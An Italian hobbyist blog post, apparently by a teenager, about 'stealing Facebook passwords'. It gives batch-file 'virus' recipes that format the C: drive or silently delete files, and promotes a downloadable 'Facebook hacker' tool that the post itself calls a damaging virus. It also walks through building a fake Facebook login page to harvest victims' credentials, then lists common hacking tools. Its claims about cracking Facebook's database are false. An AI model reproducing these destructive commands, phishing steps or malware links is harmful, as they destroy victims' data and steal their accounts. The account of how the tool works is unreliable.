Rss Feed Youtube button
rubare la password a facebook & Lista programmi hacker | Project Adobe After Effects,,Hack,Software Utile,[Lucaberlin98]
Facebook Hacking! & Lista TOOL hacker
By Luca berlingeri On 27 feb, 2012 At 09:49 PM | Categorized As Software + Crack! | With 0 Comments

RUBARE DELLE PASSWORD E CODICI  TRAMITE PROGRAMMI HACKER

Creare dei virus per windows.

Aprire “blocco note”
scrivere il codice = format C:/autotest/q/u
salvare con nome, aggiungendo alla fine .bat (virus.bat)

questo comando formatta il computer senza chiedere il permesso.

2)ELIMINARE UN FILE SPECIFICATO

Aprire “blocco note”
inserire codice = @ERASE /S/Q “C:percorso\percorso\*.*
@DEL /S/Q “C:percorso\percorso\*.*

salvare con nome, aggiungendo alla fine .bat (virus.bat)

altri comandi sono :
/P = chiedere conferma prima di eliminare il file
/F = eliminare un file di sola lettura
/S = eliminare file specificati nella sotto directory
/Q =non chiedere la conferma dell’ eliminazione dei dati

Esempio: @ERASE /Q “C:\Programmi\Messanger\msmsgs.exe”
(elimina msn)

3) BLOCCARE INTERNET

Aprire “blocco note”
inserire codice = @RD /S /Q C:\Windows\system32\telnet.exe
salvare con nome, aggiungendo alla fine .bat (virus.bat)

4)AUMENTARE IL PESO DEL FILE

per aumentere peso del file si inserisce il seguente codice sotto il codice del virus:

@REM:(srivete tutto quello che volete senza lasciare spazzi)

salvare con nome, aggiungendo alla fine .bat (virus.bat)

Nuovo tool FACEBOOK HACKER V1.9!

 

 

QUESTO TOOL  FUNZIONA AL 100% PERO’ E UN VIRUS  ABBASTANZA POTENTE TALE DA ROVINARE IL SISTEMA OPERATIVO QUINDI IO  CONSIGLIO DI  USARE QUESTO TOOL IN UN PC  CHE E DA FORMATTARE O  DA  BUTTARE

ISTRUZIONI UTILIZZO:

 

1-SCARICARE IL SETUP DA QUI:  http://www.mediafire.com/?673n4cfdnw1ati2

2-INSTALLARLO

3-APRIRLO E INSERIRE IL NOME DELLA VITTIMA FACENDO COPIA  E INCOLLA

4-CLICCARE START E ATTENDERE UN ATTIMO

5-SELEZIONARE LA NAZIONALITA’ IN CUI SI TROVA LA VITTIMA

6-ORA CLICCATE “HACK IT”

7-ASPETTATE CHE FINISCA LA PROCEDURA DI PENETRAZIONE NEL DATABASE FACEBOOK E DOPO DI TROVARE L’MD5 DELLA VITTIMA DOPO IL DECRYPTOR E DOPO IL TERMINE DEL TUTTO SOTTO AL NOME DELLA VITTIMA SI PRESENTERA’ LA PASSWORD!

ENJOY!

 

1 rubare la password di facebook questo e uno dei  famosi software ma  purtroppo non funziona in alcuni computer perché hanno una rete protetta dal gestore

2 questo software è protetto da una password per entrare la password è 8542019863015 .

3 questo software si usa così bisogna prima aprire software e cliccare è enter e inserire la password 8542019863015

4ora dobbiamo andare su hack e inserirel’id della vittima li’id lo trovate sopra la barra degli indirizzi del browser naturalmente l’indirizzo di Facebook della vittima il codice deve essere tutti codici.

5 dopo di che fate copia è andato sul programma e cliccate paste

6 adesso che stiamo setting che sotto al  software ora noi non dobbiamo toccare  nulla tranne address ip  che dobbiamo trovare per trovarlo dobbiamo scaricare questo programmino sempre degli hacker che serve a trovare l’indirizzo ip

7ora noi clicchiamo find ip ora lui troverà l’indirizzo ip.

8 quando l’ho trovato noi dobbiamo prendere gli ultimi tre codici  e inserirli nell’ultima barra del programmino (pro facebook)

9dopo averlo fatto clicchiamo connect. Attendiamo un minuto che tutto sia connesso dovrà dire on.

10 ora clicchiamo  back e finalmente  clicchiamo  HACK. ora aspettiamo che lui cerca la password però è illegale.

ECCO IL DOWNLOAD DEI SOFTWARE 

http://www.2shared.com/file/w14HLEpP/facebook__hacker_lucaberlin98.html

enjoy!!!!

fakelogin  che cose?  il fakelogin e ‘ una pagina  uguale a quella di facebook  per entrare nel proprio profilo.

Questa pagina funziona così: la vittima scrive email e password e quelle informazioni che riceviamo noi .

1Per crearla dobbiamo crearci un dominio gratuito da questo sito  naturalmente il dominio deve essere ipo cosi’ facebook060582 –> http://it.altervista.org/

2dopo aver creato il dominio dobbiamo scaricare questo programmino –>http://filezilla-project.org/

3ora dopo aver scaricato il programmino e aver creato il dominio su altervista dobbiamo aprire filezilla naturalmente dopo aver installato ora andiamo nell e-mail che abbiamo inserito nella registrazione del dominio di altervista li ci devono essere delle informazioni con su  scritto accesso all’ftp quindi scarichiamo la pagina uguale a quella di Facebook da qui ora  apriamo filezilla e inseriamo  tutto quello che ce’ dentro nella archivio  e eliminiamo tutti i file  all’interno del sito  nell ftp .

4ora abbiamo  la pagina  uguale a quella di facebook ora dobbiamo attirare la vittima a mettere la email e password dopo di che  andate  su altervista entrate nel pannello di controllo e  andate su  file update  e li troverete un foglio che ce scritta email e password della vittima!!!!!!

enjoy

LISTA TOOL HACKER

 

-

Nmap. (La sua fama lo precede, il portscanner più veloce e versatile che esista. Dotato anche di Interfaccia grafica).

BackTrack (OS). (Per eccellenze la distribuzione linux per Penetration Tester che ogni “Hacker” che si rispetti deve saper padroneggiare).

Metasploit (FrameWork). (Uno degli strumenti più importanti nel mondo hacker, è un framework davvero vasto, con tools, payload ed exploit che possono colpire la stragrande maggioranza dei sistemi informatici in circolazione. Data la sua vastità è difficile da maneggiare, per questo motivo esiste un’interfaccia grafica chiamata Armitage, che semplifica e rende più user friendly il framework, permettendo di sfruttare a pieno le sue potenzialità, davvero vastissime).

Exploit-db. (Exploit-db.com è un sito di exploit aggiornato quotidianamente sulle vulnerabilità che affliggono le piattaforme Desktop e Web, è tra i primi dopo google da essere consultato per la ricerca di eventuali vulnerabilità).

Netcat. (Il coltellino svizzero delle reti, come è stato soprannominato. Questo piccolo tool consente la creazione di connessioni in entrata ed uscita, è anche fornito di funzionalità di port scanning).

 

Shell C99/r57. (Queste 2 shell scritte in php sono tra le più famose backdoor per il web exploiting, una volta iniettate in un qualsiasi web server con interprete PHP possono gestire i file ivi presenti nonchè fornirvi la strumentazione utile per rootare l’intero server).

Aircrack. (Conosciuto molto in ambiente linux, è la suite per eccellenza per la pratica del Wardriving, impiegato esclusivamente per crakkare reti Wireless).

Wireshark/Ettercap. (Wireshark è l’implementazione di Ettercap. Entrambi software per lo sniffing di rete. Intercettano in promiscuous mode i pacchetti che trafficano in una rete LAN locale).

Firesheep. (Firesheep permette di sniffare i cookie di rete e accedere al sito a cui questi cookie sono diretti, in questo modo ci ritroviamo loggati all’interno dell’account vittima, dunque all’interno della sua sessione, ne abbiamo discusso sul blog, nel caso specifico in cui si volesse attaccare un account di facebook).

Sql Map. (Tool scritto in Python, viene usato per rilevare bug di tipo Sql Injection su siti web, munito di un potente motore di controllo riesce a capire se sono sfruttabili, facendo varie interrogazioni al database. Per il suo utilizzo è necessario l’interprete python, ed il saper installare un modulo esterno).

Ophcrack. (E’ un programma adibito al cracking di password per sistemi operativi windows basato sulle tipiche rainbow table. E’ dotato di un’interfaccia grafica e gira su più piattaforme, molto utile per il recovery di password di sistema. Qui il sito ufficiale).


Share and Enjoy

Clicca qui per inviare la tua recensione.


Submit your review
* Required Field

Ti è stato utile questo articolo?
  • POCO
  • INUTILE
  • SI MOLTO
  • ABBASTANZA
  • SI DAI..
  • NO...
Share

About - Ciao io sono Luca Berlingeri ho 15 anni, ho la passione per la tecnologia fin da quando avevo 6 anni l'età in cui mi regalarono il mio primo Pc. Sto aspettando la maggior età per mettere online dei proggetti già realizzati in questi anni. Io ho fatto questo blog solamento per aiutare la gente che ha bisogno di un software o di un problema di sistema anche Hardware e per far conosciere alla gente i servizi che gli potrò offrire In futuro.

Leave a comment

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>


Web Site By LucaBerlingeri Copyright © 2012-2013

Facebook

Twitter

Google Plus

Circa 2 anni fa iniziai a creare questo sito con lo scopo di informare e aiutare gratuitamente le persone a risolvere i propri problemi. è già uno dei siti più popolari sul web con migliaia di visitatori . lucaberlin98 fà parte della nostra comunità, e io oggi ti scrivo per chiederti di proteggere e sostenere questo sito. Possiamo riuscire ad mantenerlo disponibile in moda che tutti possono usare le informazioni che contiene come meglio credono. Possiamo farlo continuare a crescere e a farle diffondere informazioni ovunque mantenendolo aperto a tutti . Ed è per questo che chiedo a te e a tutti i membri del sito di aiutarci ad sostenere il nostro sito con una piccola donazione
Circa 2 anni fa iniziai a creare questo sito con lo scopo di informare e aiutare gratuitamente le persone a risolvere i propri problemi. è già uno dei siti più popolari sul web con migliaia di visitatori . lucaberlin98 fà parte della nostra comunità, e io oggi ti scrivo per chiederti di proteggere e sostenere questo sito. Possiamo riuscire ad mantenerlo disponibile in moda che tutti possono usare le informazioni che contiene come meglio credono. Possiamo farlo continuare a crescere e a farle diffondere informazioni ovunque mantenendolo aperto a tutti . Ed è per questo che chiedo a te e a tutti i membri del sito di aiutarci ad sostenere il nostro sito con una piccola donazione